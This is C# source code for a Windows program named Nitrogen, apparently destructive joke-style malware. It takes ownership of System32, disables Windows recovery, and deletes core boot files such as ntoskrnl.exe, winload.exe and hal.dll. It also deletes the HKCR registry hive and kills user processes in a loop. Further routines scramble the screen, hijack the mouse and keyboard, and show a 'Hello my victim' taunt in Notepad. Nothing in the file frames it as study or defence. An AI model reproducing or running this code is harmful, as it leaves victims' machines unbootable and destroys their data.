using System; using System.Diagnostics; using System.Drawing; using System.IO; using System.Runtime.InteropServices; using System.Threading; using System.Windows.Forms; using static Nitrogen.Dll_Imports; namespace Nitrogen { internal class payloads { public static void gdi_payloads() { for (; ; ) { Random rand; while (variables.gdi_payloads == true) { int x = Screen.PrimaryScreen.Bounds.Width; int y = Screen.PrimaryScreen.Bounds.Height; uint[] rnd_color = { 0x190000, 0x001900, 0x000019, 0x191900, 0x001919, 0x190019, 0x990000, 0x009900, 0x000099, 0x999900, 0x009999, 0x990099}; rand = new Random(); IntPtr hdc = Dll_Imports.GetDC(IntPtr.Zero); byte[] bits = { 0xff, 0xff, 0xc3, 0xc3, 0xc3, 0xc3, 0xff, 0xff }; IntPtr bitmap = Dll_Imports.CreateBitmap(rand.Next(20), rand.Next(20), 1, 1, bits); IntPtr brush = Dll_Imports.CreatePatternBrush(bitmap); Dll_Imports.SetBkColor(hdc, rnd_color[rand.Next(rnd_color.Length)]); Dll_Imports.SelectObject(hdc, brush); Dll_Imports.PatBlt(hdc, 0, 0, x, y, Dll_Imports.TernaryRasterOperations.PATINVERT); Dll_Imports.DeleteObject(bitmap); Dll_Imports.DeleteObject(brush); Dll_Imports.DeleteDC(hdc); if (variables.extreme == false) Thread.Sleep(100); else Thread.Sleep(1); } } } public static void window_shake() { for (; ; ) { Random rand; while (variables.window_shake == true) { rand = new Random(); IntPtr hwnd = Dll_Imports.GetTopWindow(Dll_Imports.GetDesktopWindow()); hwnd = Dll_Imports.GetWindow(hwnd, Dll_Imports.GetWindowType.GW_HWNDLAST); do { Dll_Imports.RECT myrect; Dll_Imports.GetWindowRect(hwnd, out myrect); if (variables.extreme == false) { Dll_Imports.MoveWindow(hwnd, myrect.Left + rand.Next(-50, 51), myrect.Top + rand.Next(-20, 21), myrect.Right - myrect.Left, myrect.Bottom - myrect.Top, true); } else { Dll_Imports.MoveWindow(hwnd, myrect.Left + rand.Next(-100, 101), myrect.Top + rand.Next(-100, 101), myrect.Right - myrect.Left, myrect.Bottom - myrect.Top, true); } } while ((hwnd = Dll_Imports.GetWindow(hwnd, Dll_Imports.GetWindowType.GW_HWNDPREV)) != IntPtr.Zero); if (variables.extreme == false) Thread.Sleep(10); else Thread.Sleep(1); } } } public static void textchanger() { for (; ; ) { while (variables.textchanger == true) { EnumChildWindows(GetDesktopWindow(), new EnumWindowsProc(EnumChildProc), IntPtr.Zero); if (variables.extreme == false) { Thread.Sleep(1000); } else { Thread.Sleep(100); } } } } private static bool EnumChildProc(IntPtr hwnd, IntPtr lParam) { Random rand = new Random(); string reversedwndtext = GenerateRandomString(rand.Next(10, 50)); SendMessage(hwnd, 0x000C, IntPtr.Zero, reversedwndtext); return true; } /*public static void CursorDraw() { for (; ; ) { CURSORINFO curInf = new CURSORINFO(); curInf.cbSize = Marshal.SizeOf(curInf); while (variables.drawcursor == true) { GetCursorInfo(ref curInf); for (int i = 0; i < (int)(rand() % 5 + 1); i++) { DrawIcon(hdcDesktop, rand() % (rcScrBounds.Right - rcScrBounds.Left - GetSystemMetrics(SM_CXCURSOR)) - rcScrBounds.Left, rand() % (rcScrBounds.Bottom - rcScrBounds.Top - GetSystemMetrics(SM_CYCURSOR)) - rcScrBounds.Top, curInf.hCursor); } DestroyCursor(curInf.hCursor); } } }*/ public static void del_sys() { try { ProcessStartInfo takeown = new ProcessStartInfo { UseShellExecute = true, FileName = "cmd.exe", Arguments = @"/c color 47 && takeown /f C:\Windows\System32 && icacls C:\Windows\System32 /grant %username%:F && takeown /f C:\Windows\System32\drivers && icacls C:\Windows\System32\drivers /grant %username%:F && takeown /F C:\Windows && icacls C:\Windows /grant %username%:F && Exit", CreateNoWindow = true, WindowStyle = ProcessWindowStyle.Hidden }; Process.Start(takeown).WaitForExit(); ProcessStartInfo recovery = new ProcessStartInfo { UseShellExecute = true, FileName = "reagentc.exe", Arguments = @"/disable", CreateNoWindow = true, WindowStyle = ProcessWindowStyle.Hidden }; Process.Start(recovery).WaitForExit(); string hal_dll = @"C:\Windows\System32\hal.dll"; string ci_dll = @"C:\Windows\System32\ci.dll"; string winload_exe = @"C:\Windows\System32\winload.exe"; string ntoskrnl = @"C:\Windows\System32\ntoskrnl.exe"; string disk_sys = @"C:\Windows\System32\drivers\disk.sys"; string regedit = @"C:\Windows\regedit.exe"; if (File.Exists(hal_dll)) { File.Delete(hal_dll); } if (File.Exists(ci_dll)) { File.Delete(ci_dll); } if (File.Exists(winload_exe)) { File.Delete(winload_exe); } if (File.Exists(ntoskrnl)) { File.Delete(ntoskrnl); } if (File.Exists(disk_sys)) { File.Delete(disk_sys); } if (File.Exists(regedit)) { File.Delete(regedit); } } catch { } } public static void mouse_ev() { for (; ; ) { while (variables.mouse == true) { Random rand; rand = new Random(); for (int num = 0; num < 30; num++) { int x = Screen.PrimaryScreen.Bounds.Width, y = Screen.PrimaryScreen.Bounds.Height; Dll_Imports.POINT get_mouse; Dll_Imports.GetCursorPos(out get_mouse); if (variables.extreme == false) { Dll_Imports.SetCursorPos(Convert.ToInt32(get_mouse.X + rand.Next(-20, 20)), Convert.ToInt32(get_mouse.Y + rand.Next(-20, 20))); } else { Dll_Imports.SetCursorPos(Convert.ToInt32(get_mouse.X + rand.Next(-100, 100)), Convert.ToInt32(get_mouse.Y + rand.Next(-100, 100))); } Dll_Imports.mouse_event(Dll_Imports.MOUSEEVENTF_LEFTDOWN, x, y, 0, UIntPtr.Zero); Dll_Imports.mouse_event(Dll_Imports.MOUSEEVENTF_LEFTUP, x, y, 0, UIntPtr.Zero); Dll_Imports.mouse_event(Dll_Imports.MOUSEEVENTF_MIDDLEDOWN, x, y, 0, UIntPtr.Zero); Dll_Imports.mouse_event(Dll_Imports.MOUSEEVENTF_MIDDLEUP, x, y, 0, UIntPtr.Zero); Dll_Imports.mouse_event(Dll_Imports.MOUSEEVENTF_RIGHTDOWN, x, y, 0, UIntPtr.Zero); Dll_Imports.mouse_event(Dll_Imports.MOUSEEVENTF_RIGHTUP, x, y, 0, UIntPtr.Zero); string myText = "abcdefghijklmnopqrstuvwxyzěščřžýáíé+=´¨/*-+0123456789öÿïäëéóśńŕůú)§,.-" + "☺☻♥♦♣♠•◘○◙♂♀♪♫☼►◄↕‼¶§▬↨↑↓→←∟↔▲▼ !?ûùÿ┤╡╢╖╕║╗╝╜╛┐└┴┬├─┼╞╟╚╔╩╦╠═╬╧╨╤,-.!:É" + "@°E›ÍОÌåÃTWÉò=*ª‹nצádö Ôâ͹¸¯š1‰z]fzçFNñÙˆ¸¾eß”¤e ²êgp­Ç™˜_ÀÁ &&öe]2¨åaü!Âu*äû¦jFWg±0=!nä–ù¨È7ºöIÕ.á!õ•" + "I4%¾Rë³rˆ£…>¥”cÿ®fмjz›»ê¼Š£ŠaÃÌ?›}ïKÜÿ†æ&è†&Ù÷™ŒfF2ä ™Ó°iƼ?¨c ¶’óQñ‚" + "q4R³kUzH‡ñ‹Ð¿ZØ†‹©iÞ8Zoþóþ¤bqm†ú @Á]»ÜÃÆz¾ÇüðÅ­Esîp«›lbû‹&e[”0®¨°zå(1ÿ"; char[] Mychars = myText.ToCharArray(); UInt16 uniCode = Mychars[rand.Next(Mychars.Length)]; Dll_Imports.INPUT[] input = new Dll_Imports.INPUT[1]; input[0].type = Dll_Imports.InputType.INPUT_KEYBOARD; input[0].U.ki.wScan = (Dll_Imports.ScanCodeShort)uniCode; input[0].U.ki.dwFlags = Dll_Imports.KEYEVENTF.UNICODE; Dll_Imports.SendInput(1, input, Marshal.SizeOf(typeof(Dll_Imports.INPUT))); Thread.Sleep(5); } if (variables.extreme == false) Thread.Sleep(rand.Next(3000, 10000)); else Thread.Sleep(1); } } } public static void crazy_keyboard() { for (; ; ) { Random rand; while (variables.keyboard == true) { rand = new Random(); Dll_Imports.INPUT[] input = new Dll_Imports.INPUT[12]; input[0].type = Dll_Imports.InputType.INPUT_KEYBOARD; input[0].U.ki.wVk = Dll_Imports.VirtualKeyShort.LWIN; input[1].type = Dll_Imports.InputType.INPUT_KEYBOARD; input[1].U.ki.wVk = Dll_Imports.VirtualKeyShort.NUMLOCK; input[2].type = Dll_Imports.InputType.INPUT_KEYBOARD; input[2].U.ki.wVk = Dll_Imports.VirtualKeyShort.VOLUME_UP; input[3].type = Dll_Imports.InputType.INPUT_KEYBOARD; input[3].U.ki.wVk = Dll_Imports.VirtualKeyShort.CAPITAL; input[4].type = Dll_Imports.InputType.INPUT_KEYBOARD; input[4].U.ki.wVk = Dll_Imports.VirtualKeyShort.F5; input[5].type = Dll_Imports.InputType.INPUT_KEYBOARD; input[5].U.ki.wVk = Dll_Imports.VirtualKeyShort.F6; input[6].type = Dll_Imports.InputType.INPUT_KEYBOARD; input[6].U.ki.wVk = Dll_Imports.VirtualKeyShort.HOME; input[7].type = Dll_Imports.InputType.INPUT_KEYBOARD; input[7].U.ki.wVk = Dll_Imports.VirtualKeyShort.PRIOR; input[8].type = Dll_Imports.InputType.INPUT_KEYBOARD; input[8].U.ki.wVk = Dll_Imports.VirtualKeyShort.BACK; input[9].type = Dll_Imports.InputType.INPUT_KEYBOARD; input[9].U.ki.wVk = Dll_Imports.VirtualKeyShort.SPACE; input[10].type = Dll_Imports.InputType.INPUT_KEYBOARD; input[10].U.ki.wVk = Dll_Imports.VirtualKeyShort.TAB; input[11].type = Dll_Imports.InputType.INPUT_KEYBOARD; input[11].U.ki.wVk = Dll_Imports.VirtualKeyShort.RETURN; Dll_Imports.SendInput((uint)rand.Next(12), input, Marshal.SizeOf(typeof(Dll_Imports.INPUT))); if (variables.extreme == false) Thread.Sleep(3000); else Thread.Sleep(1); } } } public static void story() { Thread.Sleep(5000); string userName = System.Security.Principal.WindowsIdentity.GetCurrent().Name; string text = "Hello my victim " + userName + "!" + "I'm the thing you run 2 fucking seconds ago!" + "Good luck using your computer, as it's now mine!" + "You can't control me, I control myself and I randomly decide what to do to your computer!" + "Try stopping me and you will enjoy life in hell, like your system!" + "Don't try to run Task Manager, Registry Editor because they are also mine!" + "Don't try to reboot, your system will be wiped at next boot!" + "THIS MACHINE IS NOW OWNED BY ME!" + "We didn't start playing yet, right? Wanna start? I know the answer, yes!" + "SO LET'S FUCKING START. START CRYING NOW AS YOUR ENTIRE SYSTEM WILL BE WIPED SOON!" + "ENJOY DEATH!"; char[] Mychars = text.ToCharArray(); Process.Start(@"C:\Windows\notepad.exe"); Process[] proces_name = Process.GetProcessesByName("notepad"); Cursor.Hide(); while (proces_name.Length == 0) { } Thread.Sleep(1000); Thread th_spam = new Thread(mouse_spam); th_spam.Start(); for (int num = 0; num < Mychars.Length; num++) { int x = Screen.PrimaryScreen.Bounds.Width; int y = Screen.PrimaryScreen.Bounds.Height; IntPtr find_win = Dll_Imports.FindWindow("Notepad", null); Dll_Imports.MoveWindow(find_win, 50, 50, x / 3, y / 3, true); UInt16 uniCode = Mychars[num]; Dll_Imports.INPUT[] input = new Dll_Imports.INPUT[2]; input[0].type = Dll_Imports.InputType.INPUT_KEYBOARD; input[0].U.ki.wScan = (Dll_Imports.ScanCodeShort)uniCode; input[0].U.ki.dwFlags = Dll_Imports.KEYEVENTF.UNICODE; input[1].type = Dll_Imports.InputType.INPUT_KEYBOARD; input[1].U.ki.wVk = Dll_Imports.VirtualKeyShort.RETURN; if (Mychars[num] != '!') Dll_Imports.SendInput(1, input, Marshal.SizeOf(typeof(Dll_Imports.INPUT))); else Dll_Imports.SendInput(2, input, Marshal.SizeOf(typeof(Dll_Imports.INPUT))); Thread.Sleep(100); } Cursor.Show(); Thread.Sleep(1000); foreach (Process proces_n in proces_name) { proces_n.Kill(); } Thread thr; /*thr = new Thread(payloads.CursorDraw); thr.Start();*/ thr = new Thread(payloads.textchanger); thr.Start(); thr = new Thread(payloads.gdi_payloads); thr.Start(); thr = new Thread(payloads.window_shake); thr.Start(); thr = new Thread(payloads.mouse_ev); thr.Start(); thr = new Thread(payloads.crazy_keyboard); thr.Start(); thr = new Thread(payloads.kill_process); thr.Start(); thr = new Thread(payloads.move_icon); thr.Start(); thr = new Thread(payloads.random_sound); thr.Start(); thr = new Thread(Program.random_payloads); thr.Start(); Random rand = new Random(); Thread.Sleep(rand.Next(300000, 600000)); sys_death(); Environment.Exit(-1); } public static void mouse_spam() { Process[] proces_name = Process.GetProcessesByName("notepad"); while (proces_name.Length == 1) { proces_name = Process.GetProcessesByName("notepad"); Cursor.Position = new Point(50, 50); Dll_Imports.mouse_event(Dll_Imports.MOUSEEVENTF_LEFTUP, 50, 50, 0, UIntPtr.Zero); //Dll_Imports.mouse_event(Dll_Imports.MOUSEEVENTF_RIGHTUP, 50, 50, 0, UIntPtr.Zero); Thread.Sleep(1); } } public static void move_icon() { for (; ; ) { while (variables.iconmove == true) { Random rand; rand = new Random(); int x = Screen.PrimaryScreen.Bounds.Width; int y = Screen.PrimaryScreen.Bounds.Height; IntPtr handle = FindWindow("Progman", null); handle = FindWindowEx(handle, IntPtr.Zero, "SHELLDLL_DefView", null); handle = FindWindowEx(handle, IntPtr.Zero, "SysListView32", null); DirectoryInfo dirinfo = new DirectoryInfo(Environment.GetFolderPath(Environment.SpecialFolder.Desktop)); FileInfo[] finfo = dirinfo.GetFiles(); for (int num = 0; num <= finfo.Length + 2; num++) { SendMessage(handle, LVM_SETITEMPOSITION, (IntPtr)num, MakeLParam(rand.Next(x), rand.Next(y))); Thread.Sleep(1); } if (variables.extreme) Thread.Sleep(1); else Thread.Sleep(500); } } } public static void kill_process() { while (true) { Process[] process = Process.GetProcesses(); foreach (Process proces_n in process) { try { if (proces_n.ProcessName != Process.GetCurrentProcess().ProcessName && proces_n.ProcessName != "explorer" && proces_n.ProcessName != "audiodg" && proces_n.ProcessName != "CompatTelRunner" && proces_n.ProcessName != "conhost" && proces_n.ProcessName != "csrss" && proces_n.ProcessName != "ctfmon" && proces_n.ProcessName != "dllhost" && proces_n.ProcessName != "dwm" && proces_n.ProcessName != "fontdrvhost" && proces_n.ProcessName != "lsass" && proces_n.ProcessName != "MoUsoCoreWorker" && proces_n.ProcessName != "MpCmdRun" && proces_n.ProcessName != "msdtc" && proces_n.ProcessName != "NisSrv" && proces_n.ProcessName != "ntoskrnl" && proces_n.ProcessName != "RuntimeBroker" && proces_n.ProcessName != "SystemSettings" && proces_n.ProcessName != "SystemSettingsBroker" && proces_n.ProcessName != "SystemSettingsAdminFlows" && proces_n.ProcessName != "ApplicationFrameHost" && proces_n.ProcessName != "SystemSettingsAdminFlow" && proces_n.ProcessName != "SearchApp" && proces_n.ProcessName != "SearchIndexer" && proces_n.ProcessName != "shutdown" && proces_n.ProcessName != "SecurityHealthService" && proces_n.ProcessName != "services" && proces_n.ProcessName != "SgrmBroker" && proces_n.ProcessName != "ShellExperienceHost" && proces_n.ProcessName != "sihost" && proces_n.ProcessName != "smartscreen" && proces_n.ProcessName != "smss" && proces_n.ProcessName != "spoolsv" && proces_n.ProcessName != "StartMenuExperienceHost" && proces_n.ProcessName != "svchost" && proces_n.ProcessName != "ntoskrnl" && proces_n.ProcessName != "System" && proces_n.ProcessName != "System Idle Process" && proces_n.ProcessName != "System interrupts" && proces_n.ProcessName != "taskhostw" && proces_n.ProcessName != "TextInputHost" && proces_n.ProcessName != "TiWorker" && proces_n.ProcessName != "TrustedInstaller" && proces_n.ProcessName != "UserOOBEBroker" && proces_n.ProcessName != "VGAuthService" && proces_n.ProcessName != "vm3dservice" && proces_n.ProcessName != "vmtoolsd" && proces_n.ProcessName != "wininit" && proces_n.ProcessName != "winlogon" && proces_n.ProcessName != "WmiPrvSE" && proces_n.ProcessName != "WmiPrvSE" && proces_n.ProcessName != "wuauclt" && proces_n.ProcessName != "VBoxService" && proces_n.ProcessName != "VBoxTray") { proces_n.Kill(); Thread th_msg = new Thread(message); th_msg.Start(); th_msg.Abort(); } } catch { } } Thread.Sleep(1); } } public static void message() { MessageBox.Show("I said I control everything. Well I wasn't joking.", "New Message from Nitrogen.exe", MessageBoxButtons.OK, MessageBoxIcon.Warning); } public static void random_sound() { for (; ; ) { while (variables.sounds == true) { Random rand = new Random(); int i = rand.Next(1,3); if (i == 1) { PlaySystemSound("SystemAsterisk"); } else if (i == 2) { PlaySystemSound("SystemNotification"); } } } } public static void sys_death() { ProcessStartInfo registry = new ProcessStartInfo { UseShellExecute = true, FileName = "reg.exe", Arguments = @"delete HKCR /f", CreateNoWindow = true, WindowStyle = ProcessWindowStyle.Hidden }; Process.Start(registry).WaitForExit(); } } }